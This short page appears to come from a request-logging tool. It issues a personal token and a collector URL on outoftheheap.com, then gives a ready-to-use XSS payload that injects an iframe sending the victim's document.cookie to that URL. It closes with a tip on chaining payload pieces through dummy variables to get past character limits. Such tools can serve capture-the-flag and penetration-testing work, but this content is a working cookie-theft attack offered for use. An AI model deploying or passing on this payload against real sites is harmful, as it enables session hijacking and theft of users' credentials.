your personal token is:
p01xw5
Use the token with the link
https://Outoftheheap.com/tools/getreq.php?t=p01xw5&var1=value1&var2=value2
A sample script for XSS injection is
<script>var x = '<iframe src="https://Outoftheheap.com/tools/getreq.php?t=p01xw5&' + document.cookie + '" />'; document.write(x);</script>
Tip: If the amount of characters is limited, use dummy variables to chain them. So end in
;var a = "and start the next piece with
";